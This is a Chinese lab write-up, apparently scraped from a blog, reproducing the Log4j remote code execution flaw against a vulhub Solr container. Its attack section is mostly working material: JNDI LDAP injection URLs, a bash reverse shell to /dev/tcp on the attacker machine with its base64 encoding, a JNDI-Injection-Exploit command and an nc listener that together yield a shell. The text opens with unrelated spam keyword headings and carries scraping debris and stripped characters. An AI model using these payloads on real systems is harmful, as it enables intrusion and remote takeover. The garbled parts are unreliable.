网站APP注册做任务,我做的电影网站为什么百度搜索不到,去黄山旅游攻略和费用是多少,主题森林wordpressLOG4介绍
是一个用Java编写的可靠#xff0c;快速和灵活的日志框架#xff08;API#xff09;#xff0c;它在Apache软件许可下发布 log4j存在远程代码执行漏洞、受影响版本2.x
部署环境
攻击机环境#xff1a;192.168.3.180
kail环境#xff1a;192.168.203.12【NAT…LOG4介绍
是一个用Java编写的可靠快速和灵活的日志框架API它在Apache软件许可下发布 log4j存在远程代码执行漏洞、受影响版本2.x
部署环境
攻击机环境192.168.3.180
kail环境192.168.203.12【NAT转换的】
部署vluhub
具体流程参考其他博主本文主要讲解在部署vluhub过程中存在的几个问题作为记录
问题一、apt-get install docker docker-compose执行失败下载失败修改外网下载也失败
获取离线安装包
直通车
Releases · docker/compose · GitHub
具体版本 下载后存储至 赋予执行权限
sudo chmod x /usr/local/bin/docker-compose
查看版本docker-compose -v 问题二、
wget https://github.com/vulhub/vulhub/archive/master.zip下载失败
手动下载https://github.com/vulhub/vulhub/archive/master.zip
上传解压
unzip vulhub-master.zip
cd vulhub-master 问题三、docker compose up -d执行失败 由于修改vluhub外网导致需要切换成国内网络 修改内容如下 重启服务 再次执行 docker compose up -d 端口8983搭建成功 地址访问
http://192.168.203.12:8983/solr/admin/cores?action1 验证是否存在漏洞
DNSLog Platform 替换发送请求
http://192.168.203.12:8983/solr/admin/cores?action${jndi:ldap://8dyb3y.dnslog.cn} 刷新dns右边这个按钮 出现下方内容则存在 bash -i /dev/tcp/192.168.3.180/6666 01 反向getshell base64编码
YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ
获取JNDI包
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 执行 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ}|{base64,-d}|{bash,-i} -A 192.168.3.180
生成获取ldap内容 有用
创建监听nc-lvvp 6666异常由于windwos 没有安装nc需要安装
直通车 netcat 1.11 for Win32/Win64 安装后火绒会报毒运行
然后在该路径下执行 nc-lvvp 6666 将生成ldap内容复制替换重新刷新一下接口
http://192.168.203.12:8983/solr/admin/cores?action${jndi:ldap://192.168.3.180:1389/mjv27z} getshell了 大概就是这么个流程
参考
centos离线安装docker,docker-compose_centos离线安装docker-compose-CSDN博客
Log4j漏洞环境搭建以及复现拿getshell_dockerlog4j环境搭建-CSDN博客
